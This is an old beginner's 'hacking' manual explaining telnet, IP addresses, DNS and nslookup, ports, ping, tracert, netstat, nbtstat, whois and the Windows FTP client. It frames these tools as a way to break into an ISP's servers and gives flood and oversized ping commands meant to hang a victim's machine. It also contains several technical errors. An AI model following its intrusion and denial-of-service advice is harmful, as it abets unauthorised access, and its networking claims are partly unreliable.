____________________________________________________________________

The Hacking Truths Manual----Net Tools The 2nd Edition
By Ankit Fadia ankit@bol.net.in
____________________________________________________________________

Now that you know how to control the working of the Windows operating system
lets go on to the basics of
using Internet tools which are really really useful for hacking.
Well to tell you the truth, Hacking would be much more easy if you were 
running
some sort of Unix on your
machine or if you had a shell account. I am writing this guide keeping in 
mind
the Newbies who are probably
stuck with Windows and I am pretty much sure that all those of you who are 
Linux
Geeks will have no
problem in figuring out doing the sam ething in Linux.
There is a common belief amonst people that Windoze is very insecure and it
sucks but then on the other
hand Red Hat too is not so great in the security sphere. There are nearly 50
known exploits to get root on a
Linux box. The reason why hackers have found so many holes or bugs in 
Windows is
due to the fact the
Windows is the most widely used OS in the world and the largest number of
Hackers have access to
Windows and the largest number of people have a go at Windoze's Security. 
The
only thing that is in support
of Linux is the fact that it is free and the concept of Open Source and 
well,
performance. What I want to say
is that Linux's performance may be better but I do not agree to what all 
people
say about the low Windoze
security.So what I think is that there is nothing wrong in Using a Windoze 
box
for Hacking. Yes Linux does
provide you access to some kewl hacking tools from the various shells but 
for
Windows there are many third
party freebies that allow you to do the same thing. Linux does make hacking
easier but there is nothing
wrong in using Windows for Hacking.But for all those of you who think other 
wise
you can and if your ISP
does not give shell account you can use your Dial Up PPP account to login 
into a
third party shell acount.To
get a free shell account goto www.cyberarmy.com or www.hobbiton.org  Their
service is pretty good.

Telnet

Telnet is the ultimate hacking tool which every hacker must know how to use
before he can even think about
Hacking into servers. Telnet is better described as a protocol which 
requires or
runs on TCP\IP.

It can be used to connect to remote computers and to run command line 
programs
by simply typing
commands into it's GUI window. Telnet does not use the resources of the 
client's
computer but uses the
resources of the server to which the client has connected. Basically it is a
terminal emulation program that
allows us to connect to remote computers. It is found at 
c:\windows\telnet.exe
in Win9x systems and
c:\winnt\system32\telnet.exe in NT machines.
If the Path statement in your machine is set correctly then if you just type
Telnet at the DOS prompt then it
will bring a GUI Windows which actually is the Telnet program.

How do I connect to remote computers using telnet?

Well it is really simple to connect to remote computers using telnet.Well 
first
launch the telnet application by
typing telnet at the DOS prompt. Once the Telnet windows pops up click on
Connect>Remote System then in the host name type the host i.e the remote
computer you want to connect
to. Then in the Port select the port you want to connect to in this case 
leave
it to Telnet. Almost always leave
the TermType to vt100.

***********************
Hacking Tip: You may be wondering what the Term Type stands for. Well 
actually
it represents various kinds
of display units. We use vt100 as it is compatible with most monitors.
**********************
Then click connect and you will be connected to the remote machine.
Now if you are a newbie you would be using the above method of telnetting to 
a
remote computer and you
would not be port surfing. Well if you really want to leanr to hack, port
surfing is a must as without learning to
port surf you will not be able to find out

The basic syntax of the telnet command is

C:\>telnet hostname.com

Now let's go through this syntax, the word telnet is followed by the host 
name
or the IP address of the host
you want to connect to which is then followed by the port on the remote 
computer
you want to connect to.If
you are confused by the new terms read on and things will become clearer.

What exactly is an IP Address?

Like in the real world, everyone has got an individual Home Address or 
telephone
number so that, that
particular individual can be contacted on that number or address, similiarly 
all
computers connected to the
Internet are given a unique Internet Protocol or IP address which can be 
used to
contact that particular
computer. In geek language an IP address would be a decimal notation that
divides the 32 bit Internet
addresses (IP) into four 8 bit fields.

Does the IP address give me some information or do the numbers stand for
anything?
Let take the example of the following IP address: 202.144.49.110
Now the first part , the numbers before the first decimal i.e 209 is the 
Network
number or the Network
Prefix.. This means that it identifies the number of the network in which 
the
host is.
The second part i.e. 144 is the Host Number, that is it identifies the 
number of
the host within the Network.
This means that in the same Network, the network number is same.
In order to provide flexibilty in the size of the Network ,there are 
different
classes of IP addresses:

Address Class               Dotted Decimal Notation Ranges
Class A ( /8 Prefixes)         1.xxx.xxx.xxx through 126.xxx.xxx.xxx
Class B ( /16 Prefixes)        128.0.xxx.xxx through 191.255.xxx.xxx
Class C ( /24 Prefixes)        192.0.0.xxx through 223.255.255.xxx

The various classes will be more clear after reading the next few lines.

Each Class A Network Address contains a 8 bit Network Prefix followed by a 
24
bit host number.They are
considered to be primitive.They are referred to as "/8''s" or just "8's" as 
they
have a 8 bit Network prefix.
In a Class B Network Address there is a 16 bit Network Prefix followed by a 
16
bit Host number. It is reffered
to as "16's".
A class C Network address conatins a 24 bit Network Prefix and a 8 bit Host
number. It is refered to as
"24's" and is commonly used by most ISP's.

Due to the growing size of the Internet the Network Administrators faced 
many
problems. The Internet
routing tables were beginning to grow and now the administrators had to 
request
another network number
from the Internet before a new network could be installed at their site.
This is where subnetting caame in. Now if your ISP is a big one and if it
provides you with dynamic IP
addresses then you will most probably see that whenever you log on to the 
net,
your IP address will have
the same first 24 bits and only the last 8 bits will keep changing. This is 
due
to the fact that when subnetting
comes in then the IP Addresses structure becomes:

xxx.xxx.zzz.yyy

where the first 2 parts are Network Prefix numbers and the zzz is the Subnet
number and the yyy is the host
number. So you are always connected to the same Subnet within the same 
Network.
As a result the first 3 parts will remain same and only the last part i.e. 
yyy
is variable.
You may be wondering, what happeded to 127 as after 126.xxx.xxx.xxx there is
straightaway 128.0.xxx.xxx.

Well 127.0.0.1 is reserved for the loopback function, this means that it 
refers
to the localhost, this means
that if you try to telnet to 127.0.0.1 , then the Telnet client will try to
connect to your own computer.

IP addresses can be of to types Dynamic and Static.
Now most of us connect to the Internet by dialing into our ISP through Dial 
up
Networking and using PPP(
Point to Point Protocol). Now when you connect to your ISP's server you are
assigned a unique IP number
which is then used to transfer data to and from your computer. That becomes 
your
address. Now the IP
address that you are assigned changes everytime your connect to your ISP 
i.e.
you are assigned a new
different IP every time you dial into your ISP, that is how it becomes
Dynamic.This means that if you have
obtained the IP address of a person once, then if he disconnects and 
reconnects
then you will have to get
his IP address again.
While other ISP's provide you with a permanent IP address as soon as you
register with them. In that case
your IP remains the same every time you connect to their server and is thus
known as a permanent IP
address.

*******************
Hacking Tip: You can find out if an IP address is a Dynamic or Static by 
issuing
the ultimate mapping tool on
the net: nslookup.Give the following command : nslookup hostname where 
hostname
is substituted by an IP
address and if the result is Non-Existant Host/ Domain then the IP is a 
Dynamic
one. If it return the
hostname which is human understandable then you can be pretty sure that the 
IP
address is a static one.
For more information on DNS lookup and nslookup read on.
******************

Now IP addresses are very difficult to remember, who can memorize IP 
addresses
of all the computers he
wants to connect to or the sites he wants to visit.Say for example I am sure 
you
would find hotmail.com
more easier to remember than something like 203.43.54.12. Here comes in DNS 
or
Domain Name
Systems.Read on for more info on DNS.

DNS

A DNS is basically a resource for converting friendly Hostnames (like,
hotmail.com)which humans can easily
understand, into IP addresses which machines need to communicate to the host
i.e. hotmail.com
Now what basically happens in that when you type www.hotmail.com in the 
location
bar of your browser, the
browser needs to perform a lookup to find the machine readable IP address so
that it can communicate with
the host.This means that the browser cannot communicate with a host if it 
has
the friendly hostname only.
Without the IP address, no communication can take place. So for the lookup, 
the
browser contacts the DNS
server setup by normally by your ISP and through the resolver tries to look 
for
the IP conversion of the
hostname the user wants to contact.

A DNS server is basically a server running DNS software.The server that the
browser first looks for a
translation is the Primary DNS server, if this primary server doesn't show 
any
match then this server
contacts another DNS server somewhere on the Internet (This becomes the 
Secondry
DNS Server.)and
looks for a match. If a match is found in the secondry server then the 
Primary
server updates it's database
so that it doesn't have to contact the Secondry server again for the same 
match.
Each DNS server stores
the hosts it has recently looked for in it's cache. Now if the Server has
recently looked for a particular
hostname, then it does not search for it again but just provides the browser
with that information from it's
cache. If the cache does not contain a particular entry, then the resolver 
looks
for the desired entry by
searching through the entire database.

New techologies are being introduced in the DNS sphere. Now take the case of
amazon.com. It is a famous
and large E-company with over a million users per day.(My rough estimate.) 
Such
large organizations have
multiple IP addresses for the same domain name. Today what happens is that 
the
DNS server returns all IP
Addresses and the browser chooses a random IP from it. But this new 
technolofy
will allow the DNS server
to return the IP of the server which has the least trafiic, so as to enhanse
surfing. So you can see DNS does
make sense.

You can see how time consuming the above process can be and it can really 
slow
down your surfing
process, a lot of time is being wasted when the browser contacts the DNS 
server
and performs a lookup, so
how do you fasten this process? How do you eliminate the fact that the 
browser
will contact the DNS server
each time you want to visit a site? Well the answer lies in the HOSTS file
hidden in the c:\windows directory.

You can map a machine's IP to any hostname by editing the c:\windows\hosts
file(It has no extension.)on
win 9.x systems, On NT the hosts file is c:\WinNT\system32\drivers\etc\hosts 
and
on Linux it is /etc/hosts.
A hosts file looks something like the below:

###############################
# Copyright (c) 1998 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP stack for Windows98
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.xx.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
1. localhost
#####################################

For example, if you know that the IP address of say hotmail.com is
207.xxx.xxx.xxx., then if you add the
following in the Hosts file then the browser will not perform a lookup and 
will
starighaway have the IP to
communicate with the host. So add the line:

207.xxx.xxx.xxx www.hotmail.com

Now your browser will connect faster to Hotmail.com. This technique can 
increase
your surfing speed
tremendously.So now that you know what a DNS is...let get on to the subject 
of
DNS lookup and Reverse
DNS lookup.

Now Linux or any other form of Unix come with a very interesting utility 
known
as nslookup. This can be
used to gather some very valueable information about a host. For details as 
to
how to use this tool to gather
information read the man pages. Windows users can download SamSpade from
www.samspade.org to
perform a nslookup.

Just as DNS lookup converts the hostname into IP address, a Reverse DNS 
Lookup
converts the IP address
of a host to the hostname thus we can conclude that a DNS lookup return 
machine
readable IP addresses
and a reverse DNS Lookup returns the human friendly hostname.

****************************
INFO: The DNS software normally runs on Port 53 of a host. So the browser
connects to port 53 to perfom a
DNS lookup.
***************************

NslookUp

So how can you use nslookup to gain some valuable information about a host? 
Well
the best way to learn
about a particular Unix command is to read the man pages.They are the 
ultimate
source of all Unix
commands and their parameters.
Now the first thing to do is, either get SamSpade from www.samspade.org or 
if
you are using a shell account
or are running any form of Unix then locate where the nslookup command is 
hidden
by issuing the following
command: ' whereis nslookup '.
I am just giving you a general introduction to nslookup, to meanr about all
Resource records or query types
do read through the Man pages.
You can use nslookup in two modes, either in the interactive mode or in the 
non
interactive mode.First I will
explain the Interactive mode. If you type nslookup at the shell prompt then 
it
launches say, the nslookup
utility or the nslookup command.

$>/usr/etc/nslookup
Default Server: hobbiton.org
Address: 12.12.12.12

Now when you type just nslookup, the machine will return the IP address and 
the
name of the server which
is running the nslookup command for you,in this case it would be my shell
account provider.
Now once launching nslookup you need to specify the query type, which is the
type of Resource Record
(RR) by typing:

set type: RR

where RR can be any of the following:

A : Address
MX : Mail Exchanger
PTR : Pointer
CNAME: Canonical Name
HINFO: Host Info.
ANY : In this case a zone transfer takes place and all information of the 
host
is returned, as a result
additional burden is put on the host and hence may cause the host to hang or
restart.

NOTE: To get full list of RR's read the man pages.

Now once the RR or the type has been set, you need to type in the host name 
or
the IP of the server you
want to gather info of.
This might not be that clear, so let me take you through an example.

Firstly for this example I am using my Linux box and am not logged on to any
shell account so my IP would
be 127.0.0.1 and am doing a A type nslookup on the host hotmail.com

$>nslookup
Server: localhost
Address: 127.0.0.1

>set type=A
>hotmail.com
Server: localhost
Address: 127.0.0.1

Note: I have typed whatever is after > and other lines are written by the
computer.

This will return the address info of the host hotmail.com. Do try it out and 
see
what you get.
Now if we want to run nslookup in Non Interactive Mode, then we have to 
write
the command in the following
format:

$>nslookup Hostname

Now in all the above examples, we did a normal DNS lookup on the host. We 
can
also use nslookup to
perform a reverse DNS lookup by instead of mentioning the Hostname, by
mentioning the IP of the host.
Eg.

$>nslookup IP address

Now that you have understood the whole concept of DNS you know what happens 
when
we issue the /dns
command in IRC.
There is yet another Unix utility or command called DIG or Domain 
Information
Groper which too like
nslookup gives info on the host. It too is a part of SamSpade.

Ports

Now that you no what an IP is and what DNS or the hostname is, lets move on 
to
Ports.
There are basically two kinds of ports--Physical(HardWare) and Virtual
(Software) You may be knowing
ports to be the slots behind your CPU to which you connect your Mouse or
Keyboard or your monitor. Well
they are physical Hardware real ports.The ports we Hackers are interested 
with
are virtual software ports.A
port is a virtual pipe through which information goes in and out. A 
particular
computer can have a large
number of ports. All ports are numbered.
Now at each port a particular service is running. A software which runs on a
port is called a service. So how
do you know which service is running on which port. Well all ports are 
numbered
and there is a general rule
which almost everyone follows which decides which service usually runs at 
which
port.
Some popular ports and services running are:

Ping 7
Systat 11
Time 13
NetStat 15
SSH 22 (This is same as Secure Shell Login)
Telnet 23
SMTP 25
Whois 43
Finger 79
HTTP 80
POP 110
NNTP 119
rlogin 513 (IP Spoofing can be used here.)

To get an entire list of port numbers and the corressponding service running 
at
that particular port, read RFC
1700 .

Ports under 1024 usually have popular well known services running on them. 
The
higher port numbers are
used say, when your browser needs to connect to a remote server maybe when 
the
browser connects to
port 80 of the remote server and requests for the default webpage. So in 
these
cases the browser chooses a
random port above 1024.

************
Newbie Note: What the hell is a RFC? Well RFC stands for Request For 
Comment.
They are Text which
cover each and every aspect of Networking and the Internet. They are written 
by
geeks and if you want to
become an uberhacker then you will have to by hear all RFC's. All these new
terms and the whole TCP\IP
protocol may sound weird and difficult to grasp but if you want to be a good
hacker then you will have to stay
with them the rest of your lives.To locate a RFC just go to your fav search
engine and type the RFC number.
*************

*************
NewBie Note:
What is a Daemon?
Well a daemon is a program that runs in the background at many Unix ports. 
If
you find a service or a
daemon running at a port, I am sure that computer is hackable.
*************

Port Scanning & Port Surfing

Now that you know everything about Telnet and have some basic Networking
knowledge lets have some fun
by learning to Port Surf. It is the first basic step in finding a hackable
server running a daemon with a hole or
a vulnerability.

Say you want to hack into your ISP's server, what do you do? You firstly 
find
out the hostnames of the
servers runned by your ISP. Now each server can have a large umber of open 
ports
and it would take days
to manually go to each port and then find out that no service is running at 
that
port. So here come in the Port
Scanning Utilities which give a list of open ports on a server. Some port
scanners alongwith the list of open
ports also gives the services running on each port and it's vulnerabilties, 
if
any.

Now port scanning takes advantage the 3-stage TCP handshake to determine 
what
ports are open on the
remote computer. To learn more about the TCP\IP protocol read the networking
manuals that I distribute on
my mailing list.

Tools like SATAN and lots of them more allow you to find out the list of 
open
ports, the daemon or the
service running at each open port and also the service's vulnerability at 
the
click of a button. You can't call
yourself a hacker if you need some Software which first of all is not 
written by
you to do something as lame
as a port scan. Well yes I do agree that looking for open ports on a server
would take a long time. But what I
am suggesting is that you use a Port scanning tool which just gives you a 
list
of open ports without the list of
services and the vulnerabilities.
I assure you, if you try and explore an open port of a remote server 
manually,
you will be able to learn more
about the remote system and also it will give you a taste of what hacking
actually is.
If you use a port scanner which gives you all details at the click of a 
button
to impres your friends, let me
assure you none of them will be impressed as I am sure anyone can use SATAN 
and
other such scanners.

Another thing you need to be careful about before port scanning your ISP is 
that
most port scanners are
very easily detected and can easily be traced and you have no excuse if you 
are
caught doing a port scan
on a host., it a sure sign of Hacker Activity.There are many stealth 
scanners
like Nmap which claim to be
untraceable. But the truth is that they are very much traceable and they are
quite inaccurate as they send
only a single packet to check if a port is open or not. And if the host is
running the right kind of Sniffer
software maybe Etherpeek then the Port scan can be easily detected and the 
IP of
the user logged. Anyway
some ISP's are really afraid of Hacking activites and even at the slightest 
hint
of some suspicious hacking
activity something like Port scannng, they can remove your account.So just 
be
careful.

************
Evil Hacking Trick: Well try to keep an eye on TCP port 12345, and UDP port
31337 these are the default
ports for the popular trojans NetBus and BO, respectively
*************

Some ISP's are quite aware of Hacking Activites and are one step ahead. They 
may
be running some
excellent software which will keep hackers away. EtherPeek is an excellent
example of a sniffing software
which can easily trace users who are port scanning. Nuke Nabber a Windows
freeware claims to be able to
block Port Scans. I have not tested it so I can't say for sure. Then there 
is
another fun program known as
Port Dumper which can fake daemon( services) like Telnet, Finger etc.

How can I find out my own IP address and what ports are open on my machine?

All this talk about IP's and ports may have made you quite interested in 
this
subect and you may be dying to
find out a method of finding out open ports on your machine and your own IP
address.
Well just type the following at the DOS prompt (Windows users) or the bash
prompt (Unix users):
netstat -a

This will return something like the following:

C:\WINDOWSnetstat -a

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    ankit-s-hax-box:1030   0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:1033   0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:1027   0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:1030   mail2.mtnl.net.in:pop3  ESTABLISHED
  TCP    ankit-s-hax-box:1033   zztop.boxnetwork.net:80  CLOSE_WAIT
  TCP    ankit-s-hax-box:137    0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:138    0.0.0.0:0              LISTENING
  TCP    ankit-s-hax-box:nbsession  0.0.0.0:0              LISTENING
  UDP    ankit-s-hax-box:1027   *:*
  UDP    ankit-s-hax-box:nbname  *:*
  UDP    ankit-s-hax-box:nbdatagram  *:*


Sockets and Ports Explained

Note: I am assuming that you have at least some knowledge about TCP\IP.

What is all the hype about socket programming? What exactly are sockets? 
TCP\IP or Transmission Control Protocol\ Internet Protocol is the language or the protocol used by computers to communicate with each other over the Internet. Say a computer whose IP address is 99.99.99.99 
wants to
communicate with
another machine whose IP address is 98.98.98.98 then would will happen?
The machine whose IP is 99.99.99.99 sends a packet addressed to another 
machine
whose IP is
98.98.98.98. When 98.98.98.98 receives the packet then it verifies that it 
got
the message by sending a
signal back to 99.99.99.99.
But say the person who is using 99.99.99.99 wants to have simunateously more
than one connections to
98.98.98.98.....then what will happen? Say 99.99.99.99 wants to connect to 
the
FTP daemon and download
a file by FTP and at the same time it wants to conect to 98.98.98.98's 
website
i.e. connect to HTTP daemon.
Then 98.98.98.98. will have 2 connects with 99.99.99.99 simountaneously.Now 
how
can 98.98.98.98.
distinguish between the two connections...how does 98.98.98.98. know which 
is
for the FTP daemon and
which for the HTTP daemon? If there was no way to distinguish between the 
two
connections then they
would both get mixed up and there would be a lot of chaos with the message 
meant
for the HTTP daemon
going to the FTP daemon. To avoid such confusion we have ports. At each 
port a
particular service or
daemon is running by default. So now that the 99.99.99.99 computers knows 
which
port to connect to, to
download a FTP file and which port to connect to, to download the web page, 
it
will communicate with the
98.98.98.98 machine using what is known as the socket pair which is a
combination of an IP address and a
Port. So in the above case the message which is meant for the FTP daemon 
will be
addressed to
98.98.98.98 : 21 (Notice the colon and the default FTP port suceeding it.). 
So
that the receiving machine i.e.
98.98.98.98 will know for which service this message is meant for and to 
which
port it should be directed to.
In TCP\IP or over the Internet all communication is done using the Socket 
pair
i.e. the combination of the IP
address and the port.

DOS Hacking utilities shipping with Windows and Linux Utilities too

Most Hacker Friendly utilities that ship with Windoze are hidden and a 
normal
user will not be able to find
them.All of them are either in the c:\windows directory or are in the 
Windows
Installation CD.

PING

Now lets start with what exactly Ping is. Now Ping is a part of the ICMP
protocol i.e the Internet Control
Message Protocol. ICMP is a protocol used to troubleshoot TCP\IP networks. 
Ping
is a command which
sends out a datagram to the specified host. This specified host if alive 
i.e.
turned on sends out a reply or
echos off the same Datagram. If the datagram that reaches back to your 
computer
has the same datagram
that was sent then it means that the host is alive. So Ping is basically a
command which allows you to check
if a host is alive or not. It can also be used to calculate the amount of 
time
taken for a datagram to reach the
host. It is so deadly that it can be used to ping a hostname perpetually 
which
may even cause the host to
crash. Now what happens is that when a host receives a Ping signal, it 
allocates
some of it's resources to
attend to or to echo back the datagram. Now if you Ping a host perpetually, 
then
a time will come when all
resources of the host are used and the host either hangs or restarts.
Due to Ping's deadly nature, most shell account ISP's hide the Ping utility. 
To
find it issue the folowing
command:

whereis ping

It is usually hidden in /usr/etc

Ping has many parameters and a list of parameters can be found by reading 
the
man pages or if you are
running Windows you can get help by simply typing ping at the DOS prompt.

The flood ping which pings a host perpetually is:

ping -f hostname

ping -a hostname can be used to resolve addresses to hostnames.

When I typed ping at the dos prompt I go the following help:

C:\WINDOWS>ping
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specifed host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

You can even Ping yourself. Earlier I had told you guys that the IP 
127.0.0.1 is
the local host, this means
that when you connect to 127.0.0.1 then you actually connect to your own
machine.
So to ping yourself perpetually , issue the following command:

ping -f 127.0.0.1

Well actually the Flood ping no longer works on most OS's as they have be
updated.

The following Ping command creates a giant datagram of the size 65510 for 
Ping.
It might hang the victim's
computer.
C:\windows>ping -l 65510

Tracert

When you type hotmail.com in your browser, then your request passes through 
a
large number of
Computers before reaching hotmail.com. Or when you login to your Shell 
account
and type the password
then this password passes through a large number of computers before 
reaching
the shell account server.

To find out the list of servers your password of the request passes through, 
you
can use the tracert
command. In Unix you can use the traceroute command. Again I got help by 
simply
typing tracert at the
DOS prompt.

C:\WINDOWS>tracert
Usage: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] 
target_name
Options:
-d Do not resolve addresses to hostnames.
-h maximum_hops Maximum number of hops to search for target.
-j host-list Loose source route along host-list.
-w timeout Wait timeout milliseconds for each reply.

Lets take an example of tracing the path taken by a datagram to reach
hotmail.com from your machine.
To do this simply type the following command:
C:\windows>tracert hotmail.com


Instead of Hotmail.com you can also write the IP address of Hotmail.com 
which
you can get by doing an
nslookup. Try tracert with different parameters and see what the result is. 
That
is the best way to learn how
this command works.

Netstat

This is by far the most interesting hacking tool which gives some important
information about your ISP.
Netstat soesn't display any help information unless you type netstat /?. I 
got
the following info:

C:\WINDOWS>netstat /?
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

The -a parameter can be used to list the open ports on your computer and 
your IP
address. I have explained
it in the IP address section. For example,

C:\windows>netstat -a

Will display the Kernal Routing Information, ports open on your machine, 
your
IP, the IP of the host you are
connected to and also the port of the host to which you are connected to.
If you are logged into your shell account and give the netstat command then 
it
may give the IP addresses of
all people who are logged into that server at that moment. All these IP's 
are
Dynamic of course.

Another intersting command is the nbtstat command which too is a great tool 
to
get excellent valuable info
on a host your are connected to. For more info type nbtstat at the prompt.

C:\windows>nbtstat -A <host>

The above-mentioned command will allow the hacker to obtain a list of 
usernames,
system names, and
domains.I will mention maore about this command in the Hacking Truths Manual 
on
File Sharing.
Arp and Route are really advanced comamnds which I do not think should be
mentioned in a newbies
manual. But all of you who want more info on any of these commands can 
either
try simply typing the name
of the command or the command name followed by /?
Eg
Command /?
Will display help on the command.

**********************
Hacking Tip: ARP (Address Resolution Protocol) is used to translate IP 
addresses
to Ethernet addresses. The translation is done only for outgoing IP
packets, because this is when the IP header and the Ethernet header
are created.
IP address Ethernet address
1. 08-00-39-00-2F-C3
Route is used to display info on the routing tables.
**********************

WHOIS: Getting Info about a Domain

How do you get a .com registration? Well you register with Network Solutions
give them some money and
you have your own domain name i.e. your very own .com registration. Now all
people who register with
Network Solutions have to fill a form in which they have to enter 
information
like Name, Contact Information ,
Email Address, IP address and much more. Now all this data or info is stored 
in
a DataBase mentained by
Network Solutions. You can perfom a query which is known as a Whois query 
and
gather information on a
particular domain or host. Say you want to find out the IP or the name of 
the
person who owns the
www.hotmail.com domain,what do you do?
Well either you could go to Network Solutions site or internic.net and enter
hotmail.com in the input box or
you can directly enter the following in the location bar of your Browser and
make a whois enquiry.
Enter the following in the location bar of your browser:
http://205.177.25.9/cgi-bin/whois?hotmail.com
Note: Replace Hotmail.com with the domain name of which you want to perfom a
WHOIS query.

Manual Port Surfing

You have obtained the list of open ports by using some canned hacking tool. 
Now
what do you do? Connect
to each port of the remote server i.e. your ISP.
Now earlier I taught you a lame method of telnetting to a remote server. Now
lets get to an cool method of
connecting to a remote computer.You are not a Hacker if you do not telnet 
like
this:

C:\windows> telnet hostname.com ###

Well this command is pretty much self explanatory. Telnet calls the telnet
program, Hostname is the
hostname or the IP of the remote server and ### is the open port of the 
remote
server you want to connect
to.
It is not necessary that as port 25 is normaly the SMTP port, each and every
server would be running SMTP
at port 25. It all varies from Server to server. If you learn Port surfing 
then
you can connect to the FTP (21)
daemon and download or upload files, connect to SMTP daemon and send mail 
even
forged mail, POP
(110) to receive mail and HTTP (80) to download web pages.
OK get ready to explore the most common ports which are likely to be open on
your ISP's servers.
Port 23 is the default port to which Telnet connects to if the port number 
is
not given. Generally when we are
connected to Port 23 of the remote server then we are greeted by a Welcome
Banner and then we are given
the Login Prompt. Generally connecting to Port 23 also gives the Name of the 
OS
running at the remote
server which is invaluable in finding exploits as a particular exploit may 
work
only if the remote computer is
running the same combination of service and Operating System.
Basically connecting to Port 23 gives us the OS of the remote computer.
WIN 95/98/NT don't ship with telnet servers so unless the telnet server is
installed Port 23 would no be
open. So if Port 23 of your ISP is not open then it should be safe to think 
that
the server is not runnign Win
95/98/NT. But you can never be sure just maybe your ISP has installed a 
telnet
server and is running
Windows.
Nowdays almost none of the ISP's keep Port 23 open as the number of Hackers 
has
really increased. Now
lets move on to Port 21 or the FTP Port.
Do you use Cute FTP or some other FTP client? Ever wondered how it works?

FTP or Port 21 Explained

First of all FTP stands for File Transfer Protocol.To read geek stuff on the 
FTP
protocol read RFC 114 and
RFC 959.
FTP or File Transfer Protocol is a Protocol used to transfer files from a 
server
to a client. Now a server
would be the computer you are connected to and the client would be you 
yourself.
To connect to a FTP
server we need to have a FTP software known as the FTP client.This basically 
is
protocol popular for
tranfering files from the server to the client or vis-a-versa.So we can say 
that
FTP servers will allow you to
download and also upload files.

LIST OF FTP SERVERS
Unix FTPD
Win9x WFTPD, Microsoft Frontpage
Win NT IIS
Mac FTPD

Well it is really a simple process of FTP'ing to your favourite site. Infact
Windows itself ships with a FTP
client which is quite lame and I do not at all recommand it, but still what 
the
heck. How FTP is actually quite
self explanatory, now the FTP Client i.e the program that you run at your
computer first contacts the FTP
daemon (Service running at Port 21) on the server specified, if the Server 
has a
FTP daemon running then
you might get a welcome screen which is also known as the Daemon Banner. A
daemon Banner would be
something that either displays a welcom emessage and info on the OS or 
service
running on the host you
have FTP'ed to.A daemon banner gives us valuable info on the host we connect
to.Just remmember that if
we want to get root or break into a FTP server then we need to search for a 
hole
we can exploit, tand to
search for a hole which we can exploit, we need to know the OS, the OS 
version
and also the version on the
FTP server running by the host. This means that say there is a FTP server 
which
has 2 versions, one that
runs in Windows and the other that runs in Unix. If say the Unix version has 
a
hole, then it is not necessary
that the Windows version too would have the same hole. A hole exists due to 
the
combination of the Server
running at the OS running at the host. This means even if the OS is 
different
but the FTP server is the same,
the hole would not work.So before you start to look for holes in the FTP 
server
running at your ISP, just note
down the OS version and the FTp server version running at your ISP.The 
daemon
banner is followed by the
Password Prompt. Something like the Following:

Connected to web2.mtnl.net.in.
220-
220-#*************************************************************
220-#           Welcome to MTNL's ftp site
220-#*************************************************************
220-#
220-#  You can upload your own homepages at this site!!!
220-#
220-#  Just login with your username and upload the HTML pages.
220-#  (You can use your favourite HTML editor as well)
220-#
220-#  World will see it at http://web2.mtnl.net.in/~yourusername/
220-#
220-#  So get going......UNLEASH YOUR CREATIVITY !!!!
220-#
220-#*************************************************************
220-
220 ftp2.mtnl.net.in FTP server ready.
User (web2.mtnl.net.in:(none)): ankit
331 Password required for ankit.
Password:

Now most FTP daemons are badly configured, well actually I should say the 
system
administrators allow
Guest or anonymous Logins. What I mean by that is the FTP Daemon allows you 
to
enter Guest or
Anonymous as the Username. If you login through the Guest account, then it 
asks
you for your email
address, so that it can add to the server logs that you visited that site 
and
used the FTP Daemon.
Here instead of your true email address, you can make one up in your mind, 
just
remember to put the @
sign in between and of course no spaces.

So How Do I use the Windows FTP Client?

Well first of all I think the FTP client which ships with Windows is not a 
GUI
application.I personally do not
like it and think you should either use your Favourite FTP Client or use the
Telnet Application that ships with
Windows to connect to Port 21.
Anyway for those of who are die hard Microsoft fans or want to learn each 
and
every thing in Windows, I will
explain how this FTP Client is used. Actually this FTP program is quite 
powerful
and it makes Hacking cool.
If you use a GUI FTP program for hacking to impress your friends then they 
would
probably say that anyone
can use a GUI. This Windows FTP program may seem formidable to some at first
sight.
Now first of all goto MS DOS to run this program as it runs in DOS.Now type 
FTP
to launch it.

C:\WINDOWS>ftp

Your prompt will change to

ftp>

This is the FTP prompt and signifies that the FTP Client has been launched 
and
is running.
Now to transfer files or to do some FTP Hacking you need to know the FTP
commands. To get a list of FTP
commands type Help at the FTP prompt.

ftp> help

Commands may be abbreviated. Commands are:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary glob mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
ftp>

You may get something like the above on your screen.Instead of typing Help 
you
could also type ? that too
would give the same result. Now to get Help on individual Commands type the
following:

ftp>help [command]

Like say for example, I want to learn how to use the cd command what it does
then I type the following:
ftp>help cd

The FTP program will return this:

cd Change remote working directory

Note: Instead of the Above I could also have typed: ftp>? Cd

Different FTP Commands:

Now the Get command is used to get files from the server you are connected 
to.

ftp>get file.txt

